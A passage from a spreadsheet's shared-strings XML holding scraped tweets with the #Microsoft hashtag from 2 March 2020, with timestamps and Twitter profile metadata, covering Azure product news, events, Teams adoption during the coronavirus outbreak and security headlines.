  </si>
  <si>
    <t>Mon Mar 02 10:00:00 +0000 2020</t>
  </si>
  <si>
    <t>The #pope has joined forces with #Microsoft and# IBM to create a doctrine for ethical #AI and facial - https://t.co/kxdrobjuIv #GoogleAlerts</t>
  </si>
  <si>
    <t>{'id': 42627979, 'id_str': '42627979', 'name': 'Citadel Advantage', 'screen_name': 'StanleyEpstein', 'location': '', 'description': 'Banking, Payments, Operations Risk &amp; Back Office specialists and trainers', 'url': 'http://t.co/l6uaXkjFTj', 'entities': {'url': {'urls': [{'url': 'http://t.co/l6uaXkjFTj', 'expanded_url': 'http://finextra.com/community/blogs.aspx?mem_id=29167', 'display_url': 'finextra.com/community/blogâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4731, 'friends_count': 211, 'listed_count': 1152, 'created_at': 'Tue May 26 13:53:51 +0000 2009', 'favourites_count': 9622, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 162248,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'http://pbs.twimg.com/profile_images/1029382278399631362/IFzuMwnm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029382278399631362/IFzuMwnm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42627979/1461741776', 'profile_link_color': '4487A6',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</si>
  <si>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09:59:59 +0000 2020</t>
  </si>
  <si>
    <t>Enjoy All Things #Microsoft #ShareCamp #Unconference Mar 7-8  @MicrosoftDE https://t.co/XzoRmdI3KE #Tech #Koln</t>
  </si>
  <si>
    <t>{'id': 2465523308, 'id_str': '2465523308', 'name': 'ContentPurveyor', 'screen_name': 'contentpurveyor', 'location': 'Global', 'description': 'Everything is #Content covers updates in #Tech #Podcasts #Conferences #Meetups #Webinars #SocialMedia #Visuals. Growth through interaction.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 861, 'friends_count': 652, 'listed_count': 487, 'created_at': 'Sun Apr 27 04:20:19 +0000 2014', 'favourites_count': 937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21813,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'http://pbs.twimg.com/profile_images/1129972752285425664/BmHEmiic_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129972752285425664/BmHEmiic_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2465523308/1558241137',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</si>
  <si>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09:59:57 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting Database Mail issues in Azure SQL Managed Instance https://t.co/eHLMbuI8mq #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:59:31 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/DSngUDYqX3 #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:59:04 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/EJqqGrEha2 #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:58:27 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/3F7ExkTEvq #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:57:58 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/8m6xpTmRQf #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:57:21 +0000 2020</t>
  </si>
  <si>
    <t>Refresh your hardware and inspire #creativity and #productivity with #Microsoft #Surface. Bytes offers Surface as a Service and Managed Desktop as a Service - speak to your Bytes Account Manager or email Tellmemore@bytes.co.uk to find out more https://t.co/2ZzXotfCDY</t>
  </si>
  <si>
    <t>Mon Mar 02 09:55:22 +0000 2020</t>
  </si>
  <si>
    <t>"Microsoft is expanding its antivirus software to iOS and Android - and it's betting on AI in a bid to dominate the enterprice cybersecurity market." 
Find out more about #Microsoft's aims to prevent #phishing attacks and insider #threats here - https://t.co/r8C2MDZNq6 https://t.co/Dn8xgoNmmB</t>
  </si>
  <si>
    <t>{'id': 2759043822, 'id_str': '2759043822', 'name': 'Stripe OLT', 'screen_name': 'StripeOlt', 'location': 'Bristol and London', 'description': 'We help businesses grow with outstanding IT services. From cyber security to managed IT support, our teams will make sure you get the best from your tech.', 'url': 'http://t.co/Kk8KjA70L6', 'entities': {'url': {'urls': [{'url': 'http://t.co/Kk8KjA70L6', 'expanded_url': 'http://www.stripeolt.com', 'display_url': 'stripeolt.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 475, 'friends_count': 1060, 'listed_count': 50, 'created_at': 'Sat Aug 23 15:01:31 +0000 2014', 'favourites_count': 510, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3945,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'http://pbs.twimg.com/profile_images/1168546770680504320/5-rCRamr_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168546770680504320/5-rCRamr_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2759043822/1574850944', 'profile_link_color': '6A963B',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</si>
  <si>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09:55:12 +0000 2020</t>
  </si>
  <si>
    <t>How you can use the AIP unified labeling client TODAY https://t.co/zqI08psjjZ #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:54:13 +0000 2020</t>
  </si>
  <si>
    <t>Can't connect to Windows Share - Error code: 0x80070035. The network path was not found. https://t.co/xf5CrYuBoU #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 09:49:13 +0000 2020</t>
  </si>
  <si>
    <t>#nokia never recovered from the criminals of #microsoft 
https://t.co/Z6PeTU5ey2 Microsoft assassinated Nokia https://t.co/ii9OOF2xrf</t>
  </si>
  <si>
    <t>Mon Mar 02 09:47:10 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/rLND1CzUW5</t>
  </si>
  <si>
    <t>Mon Mar 02 09:42:46 +0000 2020</t>
  </si>
  <si>
    <t>If you're a bit worried about travelling for work why not run your meetings or workshops using Microsoft Teams. Ask me how. #office365 #business #microsoft https://t.co/821cc7LD3N</t>
  </si>
  <si>
    <t>{'id': 1199502768194514944, 'id_str': '1199502768194514944', 'name': '365 Assist - Darren Lutchner', 'screen_name': 'assist_365', 'location': 'Melbourne, Australia', 'description': 'Growing your business by helping your organisation increase your productivity using Microsoft 365 @Dlutchy', 'url': 'https://t.co/GBJQZotJfY', 'entities': {'url': {'urls': [{'url': 'https://t.co/GBJQZotJfY', 'expanded_url': 'https://365-assist.com.au/', 'display_url': '365-assist.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 63, 'listed_count': 0, 'created_at': 'Wed Nov 27 01:46:26 +0000 2019', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 63, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1207412870574592001/hahJH13m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207412870574592001/hahJH13m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1199502768194514944/1576704637',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</si>
  <si>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09:41:54 +0000 2020</t>
  </si>
  <si>
    <t>#Aberdeen&amp;amp; #Glasgow,Have you got any questions on all things #Microsoft?Ask us at #dynamicsForum.
@inc_group_uk and Clould&amp;amp;Apps BU director @IainC_IG are hosting a discussion.On the panel we have our special guests from Microsoft Umar Bari,@LucyAliceBourne and myself
Let's talk https://t.co/jLv1H4QXkF</t>
  </si>
  <si>
    <t>Mon Mar 02 09:41:01 +0000 2020</t>
  </si>
  <si>
    <t>GTconsult attains the prestigious Microsoft Gold Security Competency.
 https://t.co/ZDyui19r6W #gtconsult #microsoft #gold #security  #competency #infosec #cybersecurity #southafrica https://t.co/tcefQQp1iq</t>
  </si>
  <si>
    <t>{'id': 376309486, 'id_str': '376309486', 'name': 'GTconsult', 'screen_name': 'GT_Consult', 'location': '', 'description': 'GTconsult - Enabling Productivity - Development, Support and Protection', 'url': 'https://t.co/gl3jTKMkb5', 'entities': {'url': {'urls': [{'url': 'https://t.co/gl3jTKMkb5', 'expanded_url': 'https://www.gtconsult.com', 'display_url': 'gtconsult.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 659, 'friends_count': 585, 'listed_count': 67, 'created_at': 'Mon Sep 19 17:23:35 +0000 2011', 'favourites_count': 1606, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2844,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'http://pbs.twimg.com/profile_images/1029665187727634433/3mCq9IAU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029665187727634433/3mCq9IAU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/376309486/1582900762',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</si>
  <si>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09:35:03 +0000 2020</t>
  </si>
  <si>
    <t>Admins beware! #Microsoft gives heads-up for 'disruptive' changes to authentication in Office 365 email service. If this concerns your #business, please don't hesitate to get in touch with us as we can help.
https://t.co/f7ozmEPmoM via @TheRegister 
 #tech #office365</t>
  </si>
  <si>
    <t>Mon Mar 02 09:32:55 +0000 2020</t>
  </si>
  <si>
    <t>How to Play #Microsoft #Edges Secret Surfing Game https://t.co/9wCFkihM1J
edge://surf - Only for version 82!</t>
  </si>
  <si>
    <t>Mon Mar 02 09:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Unlikely bedfellows...
But opening up the conversation about ethics and AI is vital 
https://t.co/B8MG1pOl3i
#AI #ethics #AIforgood #techforgood #IBM #Microsoft</t>
  </si>
  <si>
    <t>{'id': 850294287824818176, 'id_str': '850294287824818176', 'name': 'Untapped', 'screen_name': 'Untapped_AI', 'location': 'City of London, London', 'description': 'Untap powerful human-AI solutions to increase innovation, productivity, inclusion, diversity &amp; human leadership', 'url': 'https://t.co/VEk9C5wvAj', 'entities': {'url': {'urls': [{'url': 'https://t.co/VEk9C5wvAj', 'expanded_url': 'http://Untapped.ai', 'display_url': 'Untapped.ai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1179, 'friends_count': 1160, 'listed_count': 27, 'created_at': 'Fri Apr 07 10:28:50 +0000 2017', 'favourites_count': 2082, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1085,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'http://pbs.twimg.com/profile_images/1005118173849403393/N_LTIyH6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1005118173849403393/N_LTIyH6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/850294287824818176/1528473961',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</si>
  <si>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09:22:30 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has cancelled its IoT in Action conference in Melbourne owing to the new #Coronavirus outbreak.
https://t.co/yRSyL13d20</t>
  </si>
  <si>
    <t>Mon Mar 02 09:22:29 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">got over charged by @MicrosoftStore for hardware and trying to get my money back has been a nightmare. Didn't expect this treatment from #Microsoft </t>
  </si>
  <si>
    <t>{'id': 54155985, 'id_str': '54155985', 'name': 'Phoâ€¢togâ€¢raâ€¢pher', 'screen_name': 'memories4life', 'location': 'London', 'description': '"Remember that not getting what you want is sometimes a wonderful stroke of luck"\n\n"The higher I build my barriers the small you\'ll become"', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 219, 'friends_count': 74, 'listed_count': 8, 'created_at': 'Mon Jul 06 08:33:26 +0000 2009', 'favourites_count': 306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 811,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'http://pbs.twimg.com/profile_images/1479492952/Untitled_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1479492952/Untitled_normal.gif', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54155985/1375017951', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '666666', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 09:22:14 +0000 2020</t>
  </si>
  <si>
    <t>Azure Offline Backup with Azure Data Box now in preview
#IFITech #Microsoft #Azure #Cloud #Storage #Backup 
https://t.co/X2AWWxCGYU</t>
  </si>
  <si>
    <t>Mon Mar 02 09:22:04 +0000 2020</t>
  </si>
  <si>
    <t>We have had another amazing Lunch and Learn Workshop last week! 
Incredible to see new and old faces, immersed in the world of #Microsoft #Teams with @SelectEllis. https://t.co/YS97wkDcqW</t>
  </si>
  <si>
    <t>{'id': 309614323, 'id_str': '309614323', 'name': 'Select Technology', 'screen_name': 'Select_Tech', 'location': 'Paddock Wood, Kent', 'description': 'We are a pioneering managed service provider, delivering world class IT support, consultancy and technology across Kent and the South East.', 'url': 'https://t.co/Ycv9BBOYcn', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ycv9BBOYcn', 'expanded_url': 'https://www.select-technology.co.uk/', 'display_url': 'select-technology.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 186, 'friends_count': 168, 'listed_count': 17, 'created_at': 'Thu Jun 02 11:26:23 +0000 2011', 'favourites_count': 160, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 475,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'http://pbs.twimg.com/profile_images/1202563333716692992/xwktstAo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202563333716692992/xwktstAo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/309614323/1575548985',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</si>
  <si>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09:21:13 +0000 2020</t>
  </si>
  <si>
    <t>Super honored to have received the #Microsoft #MVP award for #AI for the first time!! Thanks to all my #DataScience and #MachineLearning friends who are part of this wonderful community as I am.
https://t.co/TJoFomqX4c
#mvpbuzz https://t.co/vLXh2GlCE2</t>
  </si>
  <si>
    <t>{'id': 24538816, 'id_str': '24538816', 'name': 'Luca Zavarella MVP', 'screen_name': 'lucazav', 'location': 'Bergamo, Italy', 'description': 'Microsoft MVP, Mentor &amp; Technical Director at SolidQ. He plays classical piano in the free time.', 'url': 'https://t.co/jJndZVSyuC', 'entities': {'url': {'urls': [{'url': 'https://t.co/jJndZVSyuC', 'expanded_url': 'https://medium.com/@lucazav', 'display_url': 'medium.com/@lucazav', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 555, 'friends_count': 411, 'listed_count': 110, 'created_at': 'Sun Mar 15 15:40:20 +0000 2009', 'favourites_count': 2729, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3520,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'http://pbs.twimg.com/profile_images/1234495757425795073/4uoZP1DN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234495757425795073/4uoZP1DN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24538816/1505307081', 'profile_link_color': '434142',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</si>
  <si>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09:21:08 +0000 2020</t>
  </si>
  <si>
    <t>SQL Server runs best on Azure. Heres why.
#IFITech #Microsoft #Azure #Cloud #SQLServer #SQLonAzure
https://t.co/3BVtT9RWRH</t>
  </si>
  <si>
    <t>Mon Mar 02 09:20:18 +0000 2020</t>
  </si>
  <si>
    <t>#Official #Microsoft site claims 1 billion Windows 10 users - MSPoweruser #MicrosoftWindows https://t.co/PlEznLXcK7 https://t.co/ln6Hg5Zzzb</t>
  </si>
  <si>
    <t>Mon Mar 02 09:20:00 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the preview of Azure Shared Disks for clustered applications
#IFITech #Microsoft #Azure #Cloud #Storage
https://t.co/xXZyLg8YMH</t>
  </si>
  <si>
    <t>Mon Mar 02 09:15:58 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Taiwan sees booming adoption of Teams in wake of outbreak #coronavirusoutbreak #IT #CE #Microsoft #MicrosoftTaiwan #Software #bigdata #Taiwan #DIGITIMES https://t.co/WC1FPyfp9P https://t.co/gPpfOLqUqq</t>
  </si>
  <si>
    <t>{'id': 153340954, 'id_str': '153340954', 'name': 'DIGITIMES, Inc.', 'screen_name': 'DigitimesDotCom', 'location': 'Taiwan', 'description': 'The leading media outlet for the global IT and high-tech supply chain', 'url': 'https://t.co/cIENBbMq48', 'entities': {'url': {'urls': [{'url': 'https://t.co/cIENBbMq48', 'expanded_url': 'https://www.digitimes.com/en', 'display_url': 'digitimes.com/en', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2857, 'friends_count': 57, 'listed_count': 194, 'created_at': 'Tue Jun 08 08:43:11 +0000 2010', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25775,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'http://pbs.twimg.com/profile_images/599041832941539328/FVeLle2R_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/599041832941539328/FVeLle2R_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/153340954/1502689921',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</si>
  <si>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09:15:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's Detection and Response Team (DART) finds 6 APTs in the network of an unnamed "large multinational", with the initial intrusion persisting for nearly 8 months. 
https://t.co/q6yHmFonbK 
#cybersecurity #datasecurity #APT #Microsoft #incidentresponse</t>
  </si>
  <si>
    <t>{'id': 60844051, 'id_str': '60844051', 'name': 'CBROnline.com', 'screen_name': 'cbronline', 'location': 'London, UK', 'description': 'CBR is a leading #business #technology publication, delivering #news, reports &amp; analysis on #bigdata #IoT #cloud #cybersecurity and much more.', 'url': 'http://t.co/o1egQF3sg2', 'entities': {'url': {'urls': [{'url': 'http://t.co/o1egQF3sg2', 'expanded_url': 'http://www.cbronline.com/', 'display_url': 'cbronline.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22545, 'friends_count': 5483, 'listed_count': 1561, 'created_at': 'Tue Jul 28 07:46:00 +0000 2009', 'favourites_count': 271001, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 35957, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ABB8C2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/534641824170663936/6vdqy1l2_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/534641824170663936/6vdqy1l2_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/60844051/1559145672', 'profile_link_color': 'E81C4F',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</si>
  <si>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Mon Mar 02 09:14:44 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Amazon
 #Microsoft
 #Bloomberg
 #Elastic
 #Kraken
 #Binance
@Vectorspace_AI CEO KASIAN discussing recent developments in the $VXV telegram
Been following $VXV for 18 months &amp;amp; watching the projects evolution has been fascinating 
#crypto $BNB $AMZN $MSFT https://t.co/HHx5Oo49Ek</t>
  </si>
  <si>
    <t>Mon Mar 02 09:13:40 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/xqSImCQcgG #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/bDs5wDWztb</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</si>
  <si>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</si>
  <si>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09:10:38 +0000 2020</t>
  </si>
  <si>
    <t>Blog: License requirements for administering Microsoft 365 services #AzureAD #Security #Licensing #Intune #EXO #Microsoft365 #ModernWorkplace #Microsoft #Office365 #insight24_nl #wmug_nl https://t.co/VcNEeQlgzK</t>
  </si>
  <si>
    <t>Mon Mar 02 09:10:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is expanding its antivirus software to iOS and Android  and it's betting on AI in a bid to dominate the enterprise cybersecurity market https://t.co/2u7deU9teZ #CyberSecurity #microsoft #ai #ArtificialInteligence #MachineLearning https://t.co/EEFPTyS2w8</t>
  </si>
  <si>
    <t>Mon Mar 02 09:09:26 +0000 2020</t>
  </si>
  <si>
    <t>Top 5 New Xbox games Coming Out? In 2020 Review #MicrosoftWindows #theLatestNews #Microsoft https://t.co/zfx255J2hB https://t.co/DJND1MSF0I</t>
  </si>
  <si>
    <t>Mon Mar 02 09:08:18 +0000 2020</t>
  </si>
  <si>
    <t>- Bill Gates 
Follow @logic_of_legend
.
.
.
.
.
.
.
.
.
.
.
.
#billgates #billgatesquotes #microsoft #trending #quoteoftheday #logicoflegend #legend #legendwords #thoughts #spokenword #legendlogic #like #follow... https://t.co/LepwAGu56h</t>
  </si>
  <si>
    <t>{'id': 1222490729169084418, 'id_str': '1222490729169084418', 'name': 'Legend Logic', 'screen_name': 'Logic_of_legend', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Wed Jan 29 12:05:02 +0000 2020', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1231183965425303553/kQx1TUGC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231183965425303553/kQx1TUGC_normal.png',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</si>
  <si>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09:06:13 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 09:05:37 +0000 2020</t>
  </si>
  <si>
    <t>#SPORTS AGENDA , #OLYMPiC :
#Coronavirus could make 
#TokyoOlympics a 
#TV-only #event 
https://t.co/aaVrsl8TOE via @MailOnline 
#bigdata 
#AI #IOT #DiGiTAL #Twitter 
#socialMedia
@Chidambara09 #linux #china #usa #google #youtube
#Microsoft
#apple #CoronaVirusUpdate
#Japanese</t>
  </si>
  <si>
    <t>Mon Mar 02 09:05:08 +0000 2020</t>
  </si>
  <si>
    <t>Have you got #Office365 but have no idea where to start? Our resources help you get to grips with everything #Microsoft has to offer - from end user to admin level. 
https://t.co/XbpaZeUHEf https://t.co/oijGc5Oz4f</t>
  </si>
  <si>
    <t>Mon Mar 02 09:04:23 +0000 2020</t>
  </si>
  <si>
    <t>COVID-19: Microsoft cancels IoT in Action event in Melbourne
https://t.co/Cn6gqHNoPK
#COVID19 #Microsoft https://t.co/ihw2bisQ7b</t>
  </si>
  <si>
    <t>{'id': 982411422905778176, 'id_str': '982411422905778176', 'name': 'IndSamachar', 'screen_name': 'Indsamachar', 'location': 'India', 'description': 'The absolute truth is â€˜Aham Brahmasmiâ€™ rest all is relative and NEWS. News is News.We are here to help Deliver it ,not Stop it .', 'url': 'https://t.co/2jSk007qfT', 'entities': {'url': {'urls': [{'url': 'https://t.co/2jSk007qfT', 'expanded_url': 'http://www.indsamachar.com', 'display_url': 'indsamachar.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4537, 'friends_count': 0, 'listed_count': 17, 'created_at': 'Sat Apr 07 00:15:10 +0000 2018', 'favourites_count': 537, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18397, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228567926594097152/d7TDSf0G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228567926594097152/d7TDSf0G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/982411422905778176/1576999969',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</si>
  <si>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09:04:00 +0000 2020</t>
  </si>
  <si>
    <t>Tripp Partain #HPE talks about the new #HPE #Edgeline 8000, the most robust industrial toolbox addressing #publicsector #Manufacturing &amp;amp; #Telco as a platform to drive #5G Deployments!  
 #Social4UTV #Microsoft #HPEIoT @HPE_Telco @lesguer_lionel @evankirstel https://t.co/S7URxqmgn2</t>
  </si>
  <si>
    <t>Mon Mar 02 09:01:06 +0000 2020</t>
  </si>
  <si>
    <t>Need some motivation for a Monday? Why not join our next agency workshop event and discover what Azure can do for you and your customers. Join us on Thursday 12th March at our office in Farnborough https://t.co/Itn2QvCopt #microsoft #ai #digitalagency https://t.co/vam2QI2uuJ</t>
  </si>
  <si>
    <t>{'id': 245743997, 'id_str': '245743997', 'name': 'Wirehive', 'screen_name': 'wirehive', 'location': 'Farnborough, UK', 'description': 'Helping forward-thinking businesses transform the way the world operates.', 'url': 'https://t.co/j711fAzrEv', 'entities': {'url': {'urls': [{'url': 'https://t.co/j711fAzrEv', 'expanded_url': 'http://wirehive.com', 'display_url': 'wirehive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1611, 'friends_count': 831, 'listed_count': 40, 'created_at': 'Tue Feb 01 11:17:52 +0000 2011', 'favourites_count': 1013, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3397, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '403B33', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/879757601386496001/CAIMxNoH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/879757601386496001/CAIMxNoH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/245743997/1572605403', 'profile_link_color': 'FF6A13', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FCFCE5', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 09:00:58 +0000 2020</t>
  </si>
  <si>
    <t>We publish a lot of articles about #Office365 and we believe in the product. If you are unsure or unaware read our blog https://t.co/cE8m7EQPsx #Office #Outlook #ComputerSupport #ITSupport #Tech #Business #Marketing #Harrogate #Networking #Productivity #Microsoft</t>
  </si>
  <si>
    <t>{'id': 20530864, 'id_str': '20530864', 'name': 'Carl M. Hamilton - CHTSI', 'screen_name': 'chtsiuk', 'location': 'Harrogate', 'description': 'Proud father, husband, developer and entrepreneur.  Managed Services #MSP #office365 #itsupport', 'url': 'https://t.co/KG0iKbDbBl', 'entities': {'url': {'urls': [{'url': 'https://t.co/KG0iKbDbBl', 'expanded_url': 'https://www.chtsi.uk', 'display_url': 'chtsi.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 634, 'friends_count': 3145, 'listed_count': 28, 'created_at': 'Tue Feb 10 18:05:38 +0000 2009', 'favourites_count': 85, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3915,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'http://pbs.twimg.com/profile_images/1095200553687269376/gcAwYXOE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095200553687269376/gcAwYXOE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20530864/1528151105', 'profile_link_color': '19CF86',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</si>
  <si>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Mon Mar 02 09:00:41 +0000 2020</t>
  </si>
  <si>
    <t>#MyApps #Office365 #Microsoft down?</t>
  </si>
  <si>
    <t>{'id': 115043996, 'id_str': '115043996', 'name': 'tijmen schoemaker', 'screen_name': 'tuumke', 'location': 'Netherlands', 'description': "Gamer / CoD // IT Professional / Sheerenloo // TV Shows // Movies //\r\nEvery problem is progress when it's a new one", 'url': 'http://t.co/xmVRd0Lrn9', 'entities': {'url': {'urls': [{'url': 'http://t.co/xmVRd0Lrn9', 'expanded_url': 'http://www.tuumke.nl', 'display_url': 'tuumke.nl', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 176, 'listed_count': 3, 'created_at': 'Wed Feb 17 12:39:56 +0000 2010', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8723,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'http://pbs.twimg.com/profile_images/2965059299/ce275040279a24207adde9a11bb63673_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2965059299/ce275040279a24207adde9a11bb63673_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/115043996/1401095317',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</si>
  <si>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Mon Mar 02 09:00:20 +0000 2020</t>
  </si>
  <si>
    <t>Read my Mar 2 #Microsoft Newsletter featuring How to respond to... https://t.co/i5oS2Y2gT1 Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Mon Mar 02 09:00:18 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/7lDwMa4UPq</t>
  </si>
  <si>
    <t>Mon Mar 02 09:00:13 +0000 2020</t>
  </si>
